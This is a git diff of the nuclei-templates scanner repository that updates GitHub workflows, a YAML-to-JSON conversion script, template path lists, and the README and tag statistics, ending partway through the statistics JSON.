diff --git a/.github/scripts/wordpress-plugins-update-requirements.txt b/.github/scripts/wordpress-plugins-update-requirements.txt index 1271cdcb38..c40098b38d 100644 --- a/.github/scripts/wordpress-plugins-update-requirements.txt +++ b/.github/scripts/wordpress-plugins-update-requirements.txt @@ -1,6 +1,6 @@ beautifulsoup4==4.11.1 bs4==0.0.1 -certifi==2022.9.24 +certifi==2023.7.22 charset-normalizer==2.1.1 idna==3.4 Markdown==3.4.1 diff --git a/.github/scripts/yaml2json.go b/.github/scripts/yaml2json.go index 914cb5cd0a..19d7b6a6a2 100644 --- a/.github/scripts/yaml2json.go +++ b/.github/scripts/yaml2json.go @@ -16,78 +16,93 @@ type Classification struct { } type Info struct { - Name string `yaml:"name"` - Severity string `yaml:"severity"` - Description string `yaml:"description"` + Name string `yaml:"name"` + Severity string `yaml:"severity"` + Description string `yaml:"description"` Classification Classification `yaml:"classification,omitempty"` } type Data struct { - ID string `yaml:"id"` - Info Info `yaml:"info"` - FilePath string `json:"file_path"` + ID string `yaml:"id"` + Info Info `yaml:"info"` + FilePath string `json:"file_path"` } func main() { if len(os.Args) != 3 { - fmt.Println("Usage: go run main.go ") + fmt.Println("Usage: go run main.go ") os.Exit(1) } - directory := os.Args[1] + input := os.Args[1] outputFile := os.Args[2] + var directories []string + + // Check if the input contains a comma + if strings.Contains(input, ",") { + directories = strings.Split(input, ",") + } else { + directories = []string{input} + } var data []Data - err := filepath.Walk(directory, func(path string, info os.FileInfo, err error) error { - if strings.HasSuffix(path, ".yaml") || strings.HasSuffix(path, ".yml") { - yamlFile, err := ioutil.ReadFile(path) - if err != nil { - fmt.Printf("Error reading YAML file %s: %v\n", path, err) - return err - } - - var d Data - err = yaml.Unmarshal(yamlFile, &d) - if err != nil { - fmt.Printf("Error unmarshalling YAML file %s: %v\n", path, err) - return err - } - if d.Info.Classification.CVSSScore == "" { - d.Info.Classification.CVSSScore = "N/A" - } - if d.Info.Classification == (Classification{}) { - d.Info.Classification.CVSSScore = "N/A" - } - fpath := strings.Replace(path, "/home/runner/work/nuclei-templates/nuclei-templates/", "", 1) - d.FilePath = fpath - - data = append(data, d) - } - return nil - }) - - if err != nil { - fmt.Printf("Error reading directory: %v\n", err) - os.Exit(1) - } - - var jsonData []byte - for _, d := range data { - temp, err := json.Marshal(d) - if err != nil { - fmt.Printf("Error marshalling JSON: %v\n", err) - os.Exit(1) - } - jsonData = append(jsonData, temp...) - jsonData = append(jsonData, byte('\n')) - } - err = ioutil.WriteFile(outputFile, jsonData, 0644) - if err != nil { - fmt.Printf("Error writing JSON data to file: %v\n", err) - os.Exit(1) - } - - fmt.Println("JSON data written to", outputFile) - } - + for _, directory := range directories { + fmt.Println("Generating data for", directory) + + err := filepath.Walk(directory, func(path string, info os.FileInfo, err error) error { + if err != nil { + fmt.Printf("Error accessing path %s: %v\n", path, err) + return err + } + if strings.HasSuffix(path, ".yaml") || strings.HasSuffix(path, ".yml") { + yamlFile, err := ioutil.ReadFile(path) + if err != nil { + fmt.Printf("Error reading YAML file %s: %v\n", path, err) + return err + } + + var d Data + err = yaml.Unmarshal(yamlFile, &d) + if err != nil { + fmt.Printf("Error unmarshalling YAML file %s: %v\n", path, err) + return err + } + if d.Info.Classification.CVSSScore == "" { + d.Info.Classification.CVSSScore = "N/A" + } + if d.Info.Classification == (Classification{}) { + d.Info.Classification.CVSSScore = "N/A" + } + fpath := strings.Replace(path, "/home/runner/work/nuclei-templates/nuclei-templates/", "", 1) + d.FilePath = fpath + + data = append(data, d) + } + return nil + }) + + if err != nil { + fmt.Printf("Error reading directory: %v\n", err) + os.Exit(1) + } + } + + var jsonData []byte + for _, d := range data { + temp, err := json.Marshal(d) + if err != nil { + fmt.Printf("Error marshalling JSON: %v\n", err) + os.Exit(1) + } + jsonData = append(jsonData, temp...) + jsonData = append(jsonData, byte('\n')) + } + err := ioutil.WriteFile(outputFile, jsonData, 0644) + if err != nil { + fmt.Printf("Error writing JSON data to file: %v\n", err) + os.Exit(1) + } + + fmt.Println("JSON data written to", outputFile) +} diff --git a/.github/workflows/autoassign.yml b/.github/workflows/autoassign.yml index 768e6fa520..8270afc60b 100644 --- a/.github/workflows/autoassign.yml +++ b/.github/workflows/autoassign.yml @@ -1,4 +1,4 @@ -name: run assign_tasks.py +name: 🤖 issue/pr assignment on: pull_request: types: [opened] @@ -12,10 +12,10 @@ jobs: permissions: write-all runs-on: ubuntu-latest env: - ASSIGN_TASK_TOKEN: ${{ secrets.GITHUB_TOKEN }} # github personal token + ASSIGN_TASK_TOKEN: ${{ secrets.PDTEAMX_PAT }} # github personal token steps: - name: checkout repo content - uses: actions/checkout@v2 # checkout the repository content + uses: actions/checkout@v4 # checkout the repository content - name: setup python uses: actions/setup-python@v4 with: diff --git a/.github/workflows/cve2json.yml b/.github/workflows/cve2json.yml index 0ad846f2db..9f61160cf0 100644 --- a/.github/workflows/cve2json.yml +++ b/.github/workflows/cve2json.yml @@ -11,6 +11,7 @@ on: jobs: cve2json: runs-on: ubuntu-latest + if: github.repository == 'projectdiscovery/nuclei-templates' steps: - uses: actions/checkout@master - name: Set up Go @@ -23,7 +24,7 @@ jobs: run: | go env -w GO111MODULE=off go get gopkg.in/yaml.v3 - go run .github/scripts/yaml2json.go $GITHUB_WORKSPACE/http/cves/ cves.json + go run .github/scripts/yaml2json.go $GITHUB_WORKSPACE/http/cves/,$GITHUB_WORKSPACE/network/cves/ cves.json md5sum cves.json | cut -d' ' -f1 > cves.json-checksum.txt git status -s | wc -l | xargs -I {} echo CHANGES={} >> $GITHUB_OUTPUT @@ -41,4 +42,4 @@ jobs: git pull --rebase git push origin ${{ github.ref }} env: - GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} \ No newline at end of file + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} diff --git a/.github/workflows/syntax-checking.yml b/.github/workflows/syntax-checking.yml index d9fa9321c1..96947c547c 100644 --- a/.github/workflows/syntax-checking.yml +++ b/.github/workflows/syntax-checking.yml @@ -10,7 +10,7 @@ jobs: build: runs-on: ubuntu-latest steps: - - uses: actions/checkout@v2 + - uses: actions/checkout@v4 - name: Yamllint uses: karancode/yamllint-github-action@v2.1.1 with: diff --git a/.github/workflows/template-checksum.yml b/.github/workflows/template-checksum.yml index 915713f526..6bc11dd0bf 100644 --- a/.github/workflows/template-checksum.yml +++ b/.github/workflows/template-checksum.yml @@ -13,18 +13,18 @@ jobs: runs-on: ubuntu-latest if: github.repository == 'projectdiscovery/nuclei-templates' steps: - - uses: actions/checkout@v3 + - uses: actions/checkout@v4 with: fetch-depth: 0 - name: Set up Go uses: actions/setup-go@v4 with: - go-version: 1.20.x + go-version: 1.21.x - name: install checksum generator run: | - go install -v github.com/projectdiscovery/nuclei/v2/cmd/generate-checksum@dev + go install -v github.com/projectdiscovery/nuclei/v3/cmd/generate-checksum@dev - name: generate checksum id: checksum diff --git a/.github/workflows/template-db-indexer.yml b/.github/workflows/template-db-indexer.yml index f933d5078c..db45995563 100644 --- a/.github/workflows/template-db-indexer.yml +++ b/.github/workflows/template-db-indexer.yml @@ -10,13 +10,13 @@ on: jobs: index: - runs-on: ubuntu-latest + runs-on: ubuntu-latest-16-cores if: github.repository == 'projectdiscovery/nuclei-templates' steps: - name: Set up Go uses: actions/setup-go@v4 with: - go-version: 1.19 + go-version: 1.21.x - name: Installing Indexer run: | diff --git a/.github/workflows/template-sign.yml b/.github/workflows/template-sign.yml new file mode 100644 index 0000000000..d5f91377cd --- /dev/null +++ b/.github/workflows/template-sign.yml @@ -0,0 +1,51 @@ +name: ☑️ Template Sign + +on: + push: + branches: + - main + paths: + - '**.yaml' + workflow_dispatch: + +jobs: + build: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + with: + fetch-depth: 0 + + - name: Set up Go + uses: actions/setup-go@v4 + with: + go-version: 1.21.x + + - name: nuclei install + run: go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@dev + + - name: Template Sign + id: sign + run: | + nuclei -lfa -duc -sign -t /home/runner/work/nuclei-templates/nuclei-templates + nuclei -lfa -duc -t /home/runner/work/nuclei-templates/nuclei-templates + git status -s | wc -l | xargs -I {} echo CHANGES={} >> $GITHUB_OUTPUT + env: + NUCLEI_USER_CERTIFICATE: ${{ secrets.NUCLEI_USER_CERTIFICATE }} + NUCLEI_USER_PRIVATE_KEY: ${{ secrets.NUCLEI_USER_PRIVATE_KEY }} + + - name: Commit files + if: steps.sign.outputs.CHANGES > 0 + run: | + git config --local user.email "action@github.com" + git config --local user.name "GitHub Action" + git add cves.json cves.json-checksum.txt + git commit -m "Auto Template Signing [$(date)] :robot:" -a + + - name: Push changes + if: steps.sign.outputs.CHANGES > 0 + run: | + git pull --rebase + git push origin ${{ github.ref }} + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} diff --git a/.github/workflows/template-validate.yml b/.github/workflows/template-validate.yml index c7beb05704..eb53b50235 100644 --- a/.github/workflows/template-validate.yml +++ b/.github/workflows/template-validate.yml @@ -10,20 +10,20 @@ jobs: build: runs-on: ubuntu-latest steps: - - uses: actions/checkout@v3 + - uses: actions/checkout@v4 with: fetch-depth: 0 - name: Set up Go uses: actions/setup-go@v4 with: - go-version: 1.20.x + go-version: 1.21.x - name: nuclei install - run: go install -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest + run: go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest - name: Template Validation run: | cp -r ${{ github.workspace }} $HOME - nuclei -duc -validate - nuclei -duc -validate -w ./workflows \ No newline at end of file + nuclei -duc -validate -allow-local-file-access + nuclei -duc -validate -w ./workflows -allow-local-file-access diff --git a/.github/workflows/templateman.yml b/.github/workflows/templateman.yml index 3c4ae4794f..38513e5e19 100644 --- a/.github/workflows/templateman.yml +++ b/.github/workflows/templateman.yml @@ -13,23 +13,26 @@ jobs: runs-on: ubuntu-latest if: github.repository == 'projectdiscovery/nuclei-templates' steps: - - uses: actions/checkout@master + - uses: actions/checkout@v4 with: fetch-depth: 0 - name: Set up Go uses: actions/setup-go@v4 with: - go-version: 1.20.x + go-version: 1.21.x - name: Install TemplateMan CLI Client run: | - go install -v github.com/projectdiscovery/nuclei/v2/cmd/tmc@dev + git config --global url."https://${{ secrets.ACCESS_TOKEN }}@github".insteadOf https://github + git clone https://github.com/projectdiscovery/templateman.git + cd templateman/templateman-cli/cmd/tmc + go install - name: Run TemplateMan id: tmc run: | - tmc -i $GITHUB_WORKSPACE -mr + echo /home/runner/work/nuclei-templates/nuclei-templates | tmc -mr -e git status -s | wc -l | xargs -I {} echo CHANGES={} >> $GITHUB_OUTPUT - name: Commit files diff --git a/.github/workflows/templates-stats.yml b/.github/workflows/templates-stats.yml index b9b699ece9..368aed20f1 100644 --- a/.github/workflows/templates-stats.yml +++ b/.github/workflows/templates-stats.yml @@ -10,7 +10,7 @@ jobs: build: runs-on: ubuntu-latest steps: - - uses: actions/checkout@v3 + - uses: actions/checkout@v4 with: fetch-depth: 0 diff --git a/.github/workflows/wordpress-plugins-update.yml b/.github/workflows/wordpress-plugins-update.yml index aa211f7838..063b61f7f9 100644 --- a/.github/workflows/wordpress-plugins-update.yml +++ b/.github/workflows/wordpress-plugins-update.yml @@ -10,7 +10,7 @@ jobs: runs-on: ubuntu-latest steps: - name: Check out repository code - uses: actions/checkout@v3 + uses: actions/checkout@v4 with: persist-credentials: false # otherwise, the token used is the GITHUB_TOKEN, instead of your personal token fetch-depth: 0 # otherwise, you will failed to push refs to dest repo diff --git a/.gitignore b/.gitignore index 31e1cc8224..00d07ddecb 100644 --- a/.gitignore +++ b/.gitignore @@ -2,4 +2,5 @@ .DS_Store local/ .checksum -.new-additions \ No newline at end of file +.new-additions +*.txt \ No newline at end of file diff --git a/.new-additions b/.new-additions index 6a3f92ccac..a8980ca03b 100644 --- a/.new-additions +++ b/.new-additions @@ -1,12 +1,4 @@ -file/webshell/asp-webshell.yaml -file/webshell/jsp-webshell.yaml -file/webshell/php-webshell.yaml -http/cves/2018/CVE-2018-6530.yaml -http/cves/2023/CVE-2023-28121.yaml -http/exposed-panels/arangodb-web-Interface.yaml -http/exposed-panels/arcserve-panel.yaml -http/exposed-panels/cloudpanel-login.yaml -http/exposed-panels/dell-idrac.yaml -http/exposed-panels/efak-login-panel.yaml -http/exposed-panels/pritunl-panel.yaml -http/exposed-panels/untangle-admin-login.yaml +http/default-logins/goip-default-login.yaml +http/exposed-panels/cisco/cisco-ios-xe-panel.yaml +http/exposed-panels/kiteworks-pcn-panel.yaml +http/exposed-panels/truenas-scale-panel.yaml diff --git a/.nuclei-ignore b/.nuclei-ignore index 81ba0d7c4b..55b9065d42 100644 --- a/.nuclei-ignore +++ b/.nuclei-ignore @@ -24,14 +24,7 @@ tags: files: - http/cves/2006/CVE-2006-1681.yaml - - http/cves/2007/CVE-2007-5728.yaml - - http/cves/2014/CVE-2014-9608.yaml - - http/cves/2018/CVE-2018-5233.yaml - http/cves/2019/CVE-2019-14696.yaml - - http/cves/2020/CVE-2020-11930.yaml - - http/cves/2020/CVE-2020-19295.yaml - http/cves/2020/CVE-2020-2036.yaml - http/cves/2020/CVE-2020-28351.yaml - - http/cves/2021/CVE-2021-35265.yaml - http/vulnerabilities/oracle/oracle-ebs-xss.yaml - - http/vulnerabilities/other/nginx-module-vts-xss.yaml \ No newline at end of file diff --git a/.yamllint b/.yamllint index b7e17e0288..7792649366 100644 --- a/.yamllint +++ b/.yamllint @@ -18,4 +18,8 @@ rules: ignore-shebangs: true min-spaces-from-content: 1 empty-lines: - max: 5 \ No newline at end of file + max: 5 + braces: + forbid: true + brackets: + forbid: true \ No newline at end of file diff --git a/README.md b/README.md index 09c8b05381..01b773704d 100644 --- a/README.md +++ b/README.md @@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags, | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|--------------|-------|----------------------|-------|----------|-------|------|-------| -| cve | 1908 | dhiyaneshdk | 882 | http | 5970 | info | 2907 | file | 130 | -| panel | 909 | dwisiswant0 | 796 | workflows | 190 | high | 1298 | dns | 18 | -| wordpress | 787 | daffainfo | 664 | file | 130 | medium | 1076 | | | -| exposure | 692 | pikpikcu | 353 | network | 98 | critical | 717 | | | -| wp-plugin | 678 | pdteam | 280 | ssl | 24 | low | 224 | | | -| xss | 660 | pussycat0x | 258 | dns | 18 | unknown | 27 | | | -| osint | 652 | geeknik | 221 | headless | 9 | | | | | -| tech | 614 | ricardomaia | 220 | contributors.json | 1 | | | | | -| edb | 597 | ritikchaddha | 217 | cves.json | 1 | | | | | -| lfi | 557 | 0x_akoko | 179 | TEMPLATES-STATS.json | 1 | | | | | +| cve | 2239 | dhiyaneshdk | 1088 | http | 6768 | info | 3275 | file | 310 | +| panel | 1018 | dwisiswant0 | 798 | file | 310 | medium | 1413 | dns | 17 | +| wordpress | 923 | daffainfo | 787 | workflows | 191 | high | 1412 | | | +| xss | 837 | pikpikcu | 353 | network | 119 | critical | 888 | | | +| exposure | 820 | pussycat0x | 298 | ssl | 27 | low | 234 | | | +| wp-plugin | 807 | pdteam | 283 | dns | 17 | unknown | 31 | | | +| osint | 675 | ritikchaddha | 275 | headless | 10 | | | | | +| tech | 637 | ricardomaia | 226 | javascript | 2 | | | | | +| lfi | 614 | geeknik | 221 | TEMPLATES-STATS.json | 1 | | | | | +| edb | 598 | theamanrawat | 221 | contributors.json | 1 | | | | | -**412 directories, 6679 files**. +**511 directories, 7690 files**. diff --git a/TEMPLATES-STATS.json b/TEMPLATES-STATS.json index a240e65b7d..916f104f65 100644 --- a/TEMPLATES-STATS.json +++ b/TEMPLATES-STATS.json @@ -1 +1 @@ -{"tags":[{"name":"cve","count":1908},{"name":"panel","count":909},{"name":"wordpress","count":787},{"name":"exposure","count":692},{"name":"wp-plugin","count":678},{"name":"xss","count":660},{"name":"osint","count":652},{"name":"tech","count":614},{"name":"edb","count":597},{"name":"lfi","count":557},{"name":"cve2021","count":434},{"name":"rce","count":427},{"name":"cve2022","count":401},{"name":"packetstorm","count":369},{"name":"wpscan","count":348},{"name":"misconfig","count":305},{"name":"wp","count":291},{"name":"unauth","count":272},{"name":"token-spray","count":240},{"name":"cve2020","count":237},{"name":"top-200","count":208},{"name":"osint-social","count":207},{"name":"authenticated","count":204},{"name":"sqli","count":203},{"name":"kev","count":200},{"name":"config","count":195},{"name":"","count":194},{"name":"oast","count":169},{"name":"token","count":157},{"name":"apache","count":151},{"name":"cve2018","count":150},{"name":"iot","count":149},{"name":"cve2019","count":148},{"name":"default-login","count":147},{"name":"joomla","count":136},{"name":"file","count":135},{"name":"login","count":130},{"name":"redirect","count":115},{"name":"cve2010","count":112},{"name":"top-100","count":100},{"name":"files","count":100},{"name":"cve2023","count":99},{"name":"router","count":97},{"name":"network","count":96},{"name":"ssrf","count":96},{"name":"cms","count":95},{"name":"auth-bypass","count":79},{"name":"cve2017","count":77},{"name":"devops","count":77},{"name":"takeover","count":73},{"name":"intrusive","count":72},{"name":"install","count":70},{"name":"disclosure","count":68},{"name":"oracle","count":65},{"name":"seclists","count":60},{"name":"oss","count":57},{"name":"cve2015","count":54},{"name":"cisco","count":53},{"name":"google","count":53},{"name":"cve2016","count":52},{"name":"detect","count":51},{"name":"adobe","count":50},{"name":"fileupload","count":50},{"name":"tenable","count":46},{"name":"logs","count":46},{"name":"atlassian","count":45},{"name":"osint-gaming","count":45},{"name":"vmware","count":45},{"name":"aem","count":44},{"name":"vulhub","count":44},{"name":"debug","count":44},{"name":"plugin","count":43},{"name":"cve2014","count":42},{"name":"hackerone","count":42},{"name":"osint-hobby","count":42},{"name":"osint-porn","count":42},{"name":"huntr","count":40},{"name":"generic","count":37},{"name":"traversal","count":37},{"name":"springboot","count":36},{"name":"jira","count":36},{"name":"kubernetes","count":35},{"name":"aws","count":35},{"name":"osint-misc","count":35},{"name":"injection","count":34},{"name":"listing","count":33},{"name":"deserialization","count":31},{"name":"osint-coding","count":29},{"name":"sap","count":29},{"name":"osint-tech","count":28},{"name":"log4j","count":28},{"name":"cnvd","count":28},{"name":"gitlab","count":27},{"name":"misc","count":26},{"name":"php","count":26},{"name":"microsoft","count":26},{"name":"fuzz","count":25},{"name":"proxy","count":25},{"name":"jndi","count":25},{"name":"osint-business","count":24},{"name":"firewall","count":24},{"name":"osint-finance","count":24},{"name":"cve2012","count":24},{"name":"api","count":24},{"name":"manageengine","count":24},{"name":"osint-images","count":24},{"name":"osint-shopping","count":24},{"name":"amazon","count":23},{"name":"k8s","count":23},{"name":"zoho","count":23},{"name":"wp-theme","count":22},{"name":"c2","count":21},{"name":"weblogic","count":21},{"name":"msf","count":21},{"name":"cloud","count":21},{"name":"tomcat","count":21},{"name":"ibm","count":21},{"name":"fortinet","count":20},{"name":"cicd","count":20},{"name":"jenkins","count":19},{"name":"dns","count":19},{"name":"camera","count":19},{"name":"dlink","count":19},{"name":"ssl","count":19},{"name":"struts","count":19},{"name":"github","count":19},{"name":"admin","count":18},{"name":"wavlink","count":18},{"name":"osint-music","count":18},{"name":"ftp","count":18},{"name":"service","count":18},{"name":"lfr","count":18},{"name":"ir","count":17},{"name":"cve2011","count":17},{"name":"xxe","count":16},{"name":"nginx","count":16},{"name":"printer","count":16},{"name":"cve2009","count":16},{"name":"backup","count":16},{"name":"osint-blog","count":16},{"name":"hp","count":15},{"name":"android","count":15},{"name":"status","count":15},{"name":"citrix","count":15},{"name":"magento","count":15},{"name":"cve2008","count":15},{"name":"osint-health","count":14},{"name":"woocommerce","count":14},{"name":"java","count":14},{"name":"jboss","count":14},{"name":"osint-art","count":14},{"name":"audit","count":14},{"name":"confluence","count":14},{"name":"nodejs","count":14},{"name":"cve2013","count":14},{"name":"zyxel","count":14},{"name":"mail","count":14},{"name":"domainmod","count":14},{"name":"creds-stuffing","count":13},{"name":"login-check","count":13},{"name":"azure","count":13},{"name":"abstractapi","count":13},{"name":"osint-political","count":13},{"name":"osint-dating","count":13},{"name":"cuppa","count":13},{"name":"fortigate","count":13},{"name":"laravel","count":13},{"name":"ruijie","count":12},{"name":"netsweeper","count":12},{"name":"grafana","count":12},{"name":"ruby","count":12},{"name":"enum","count":12},{"name":"git","count":12},{"name":"webserver","count":12},{"name":"auth","count":12},{"name":"vpn","count":12},{"name":"microweber","count":12},{"name":"rails","count":12},{"name":"dashboard","count":12},{"name":"backdoor","count":12},{"name":"drupal","count":12},{"name":"graphql","count":12},{"name":"netgear","count":12},{"name":"kafka","count":12},{"name":"airflow","count":12},{"name":"cnvd2021","count":11},{"name":"phpmyadmin","count":11},{"name":"online-fire-reporting","count":11},{"name":"xstream","count":11},{"name":"setup","count":11},{"name":"sonicwall","count":11},{"name":"osint-video","count":11},{"name":"docker","count":11},{"name":"cisa","count":11},{"name":"npm","count":11},{"name":"coldfusion","count":11},{"name":"digitalocean","count":10},{"name":"ssti","count":10},{"name":"glpi","count":10},{"name":"zimbra","count":10},{"name":"headless","count":10},{"name":"symfony","count":10},{"name":"spring","count":10},{"name":"ssh","count":10},{"name":"dell","count":10},{"name":"db","count":10},{"name":"dedecms","count":10},{"name":"solarview","count":10},{"name":"bypass","count":10},{"name":"django","count":10},{"name":"jolokia","count":10},{"name":"firebase","count":9},{"name":"kube","count":9},{"name":"windows","count":9},{"name":"fastjson","count":9},{"name":"sitecore","count":9},{"name":"scada","count":9},{"name":"gitea","count":9},{"name":"vcenter","count":9},{"name":"zabbix","count":9},{"name":"thinkphp","count":9},{"name":"redis","count":9},{"name":"iis","count":9},{"name":"opencats","count":9},{"name":"cache","count":9},{"name":"wso2","count":9},{"name":"versa","count":9},{"name":"prometheus","count":9},{"name":"installer","count":9},{"name":"osint-news","count":9},{"name":"pfsense","count":9},{"name":"ecology","count":8},{"name":"cisco-switch","count":8},{"name":"console","count":8},{"name":"hms","count":8},{"name":"exchange","count":8},{"name":"ognl","count":8},{"name":"mirai","count":8},{"name":"druid","count":8},{"name":"atom","count":8},{"name":"vbulletin","count":8},{"name":"config-audit","count":8},{"name":"spotweb","count":8},{"name":"recon","count":8},{"name":"icewarp","count":8},{"name":"solr","count":8},{"name":"metadata","count":8},{"name":"unauthenticated","count":8},{"name":"emerge","count":8},{"name":"elasticsearch","count":8},{"name":"default-page","count":8},{"name":"jetbrains","count":8},{"name":"crlf","count":8},{"name":"cnvd2020","count":8},{"name":"bucket","count":8},{"name":"oauth","count":8},{"name":"smtp","count":8},{"name":"odoo","count":7},{"name":"malware","count":7},{"name":"manager","count":7},{"name":"samsung","count":7},{"name":"seeyon","count":7},{"name":"nagios","count":7},{"name":"sophos","count":7},{"name":"fortios","count":7},{"name":"shopify","count":7},{"name":"go","count":7},{"name":"maps","count":7},{"name":"squirrelmail","count":7},{"name":"error","count":7},{"name":"avtech","count":7},{"name":"vms","count":7},{"name":"nagiosxi","count":7},{"name":"gogs","count":7},{"name":"ofbiz","count":7},{"name":"websphere","count":7},{"name":"ec2","count":7},{"name":"blind","count":7},{"name":"huawei","count":7},{"name":"activemq","count":6},{"name":"python","count":6},{"name":"magmi","count":6},{"name":"mongodb","count":6},{"name":"opensis","count":6},{"name":"nexus","count":6},{"name":"jeecg","count":6},{"name":"artica","count":6},{"name":"leak","count":6},{"name":"rconfig","count":6},{"name":"doctor-appointment-system","count":6},{"name":"s3","count":6},{"name":"cobbler","count":6},{"name":"elfinder","count":6},{"name":"filemanager","count":6},{"name":"keycloak","count":6},{"name":"lucee","count":6},{"name":"microstrategy","count":6},{"name":"liferay","count":6},{"name":"plesk","count":6},{"name":"kubelet","count":6},{"name":"minio","count":6},{"name":"bigip","count":6},{"name":"database","count":6},{"name":"moodle","count":6},{"name":"pmb","count":6},{"name":"newrelic","count":6},{"name":"fpd","count":6},{"name":"openvpn","count":6},{"name":"jetty","count":6},{"name":"zhiyuan","count":6},{"name":"jamf","count":6},{"name":"node","count":6},{"name":"slack","count":6},{"name":"symantec","count":6},{"name":"solarwinds","count":6},{"name":"prestashop","count":5},{"name":"firmware","count":5},{"name":"elastic","count":5},{"name":"adminer","count":5},{"name":"metinfo","count":5},{"name":"storage","count":5},{"name":"kkfileview","count":5},{"name":"nacos","count":5},{"name":"cacti","count":5},{"name":"hybris","count":5},{"name":"parallels","count":5},{"name":"alibaba","count":5},{"name":"fatpipe","count":5},{"name":"avideo","count":5},{"name":"caucho","count":5},{"name":"tikiwiki","count":5},{"name":"resin","count":5},{"name":"typo3","count":5},{"name":"rseenet","count":5},{"name":"paypal","count":5},{"name":"cockpit","count":5},{"name":"hikvision","count":5},{"name":"ruckus","count":5},{"name":"openemr","count":5},{"name":"rfi","count":5},{"name":"microfocus","count":5},{"name":"square","count":5},{"name":"heroku","count":5},{"name":"apisix","count":5},{"name":"circarlife","count":5},{"name":"carrental","count":5},{"name":"74cms","count":5},{"name":"gocd","count":5},{"name":"server","count":5},{"name":"sql","count":5},{"name":"geoserver","count":5},{"name":"awstats","count":5},{"name":"vrealize","count":5},{"name":"avaya","count":5},{"name":"strapi","count":5},{"name":"facebook","count":5},{"name":"hashicorp","count":5},{"name":"akamai","count":5},{"name":"webmin","count":4},{"name":"stored","count":4},{"name":"postmessage","count":4},{"name":"mysql","count":4},{"name":"seagate","count":4},{"name":"kevinlab","count":4},{"name":"hoteldruid","count":4},{"name":"tokens","count":4},{"name":"sangfor","count":4},{"name":"churchcrm","count":4},{"name":"ebs","count":4},{"name":"mostra","count":4},{"name":"kibana","count":4},{"name":"oa","count":4},{"name":"zend","count":4},{"name":"telerik","count":4},{"name":"springcloud","count":4},{"name":"jellyfin","count":4},{"name":"age-encryption","count":4},{"name":"cve2005","count":4},{"name":"phppgadmin","count":4},{"name":"aspose","count":4},{"name":"pixie","count":4},{"name":"powerjob","count":4},{"name":"log","count":4},{"name":"newstatpress","count":4},{"name":"umbraco","count":4},{"name":"mostracms","count":4},{"name":"osint-archived","count":4},{"name":"horde","count":4},{"name":"express","count":4},{"name":"gnuboard","count":4},{"name":"goanywhere","count":4},{"name":"dolibarr","count":4},{"name":"cve2007","count":4},{"name":"tenda","count":4},{"name":"redmine","count":4},{"name":"kentico","count":4},{"name":"openfire","count":4},{"name":"flink","count":4},{"name":"pie-register","count":4},{"name":"httpserver","count":4},{"name":"wcs","count":4},{"name":"tls","count":4},{"name":"ldap","count":4},{"name":"photo","count":4},{"name":"panos","count":4},{"name":"cloudflare","count":4},{"name":"candidats","count":4},{"name":"rabbitmq","count":4},{"name":"hpe","count":4},{"name":"sendgrid","count":4},{"name":"search","count":4},{"name":"javascript","count":4},{"name":"puppet","count":4},{"name":"axigen","count":4},{"name":"hongdian","count":4},{"name":"sonarqube","count":4},{"name":"beyondtrust","count":4},{"name":"phpinfo","count":4},{"name":"consul","count":4},{"name":"dropbear","count":4},{"name":"spark","count":4},{"name":"aura","count":4},{"name":"ampache","count":4},{"name":"couchdb","count":4},{"name":"ems","count":4},{"name":"elementor","count":4},{"name":"mikrotik","count":4},{"name":"mautic","count":4},{"name":"centos","count":4},{"name":"arcgis","count":4},{"name":"xmlrpc","count":4},{"name":"pentaho","count":4},{"name":"voip","count":4},{"name":"grav","count":4},{"name":"concrete","count":4},{"name":"zte","count":4},{"name":"cnvd2019","count":4},{"name":"httpd","count":4},{"name":"bitbucket","count":4},{"name":"prtg","count":4},{"name":"terramaster","count":4},{"name":"mailchimp","count":4},{"name":"artifactory","count":4},{"name":"jupyter","count":4},{"name":"codeigniter","count":4},{"name":"bmc","count":4},{"name":"roxy","count":4},{"name":"royalevent","count":4},{"name":"asp","count":4},{"name":"mlflow","count":4},{"name":"telesquare","count":4},{"name":"froxlor","count":4},{"name":"stripe","count":4},{"name":"yeswiki","count":4},{"name":"thinkcmf","count":4},{"name":"nosqli","count":4},{"name":"linkerd","count":4},{"name":"nextjs","count":4},{"name":"pypi","count":3},{"name":"magnolia","count":3},{"name":"processwire","count":3},{"name":"ueditor","count":3},{"name":"openai","count":3},{"name":"tableau","count":3},{"name":"selea","count":3},{"name":"graph","count":3},{"name":"sftp","count":3},{"name":"eshop","count":3},{"name":"asus","count":3},{"name":"mailgun","count":3},{"name":"ansible","count":3},{"name":"carel","count":3},{"name":"fuelcms","count":3},{"name":"waf","count":3},{"name":"finecms","count":3},{"name":"credential","count":3},{"name":"payara","count":3},{"name":"httpbin","count":3},{"name":"fanwei","count":3},{"name":"selenium","count":3},{"name":"subrion","count":3},{"name":"zeroshell","count":3},{"name":"superadmin","count":3},{"name":"webalizer","count":3},{"name":"twitter","count":3},{"name":"geowebserver","count":3},{"name":"splunk","count":3},{"name":"messaging","count":3},{"name":"mantisbt","count":3},{"name":"circleci","count":3},{"name":"backdrop","count":3},{"name":"teamcity","count":3},{"name":"aptus","count":3},{"name":"bitrix","count":3},{"name":"targa","count":3},{"name":"mcafee","count":3},{"name":"telegram","count":3},{"name":"forum","count":3},{"name":"axway","count":3},{"name":"rocketchat","count":3},{"name":"hsphere","count":3},{"name":"metersphere","count":3},{"name":"yonyou","count":3},{"name":"mobileiron","count":3},{"name":"nuuo","count":3},{"name":"weiphp","count":3},{"name":"lighttpd","count":3},{"name":"sharepoint","count":3},{"name":"openam","count":3},{"name":"labkey","count":3},{"name":"axis","count":3},{"name":"discourse","count":3},{"name":"aria","count":3},{"name":"rancher","count":3},{"name":"webmail","count":3},{"name":"segment","count":3},{"name":"drawio","count":3},{"name":"sentry","count":3},{"name":"r-seenet","count":3},{"name":"movable","count":3},{"name":"webcam","count":3},{"name":"webadmin","count":3},{"name":"pega","count":3},{"name":"empirecms","count":3},{"name":"trixbox","count":3},{"name":"axis2","count":3},{"name":"angular","count":3},{"name":"linksys","count":3},{"name":"zerof","count":3},{"name":"pulsar",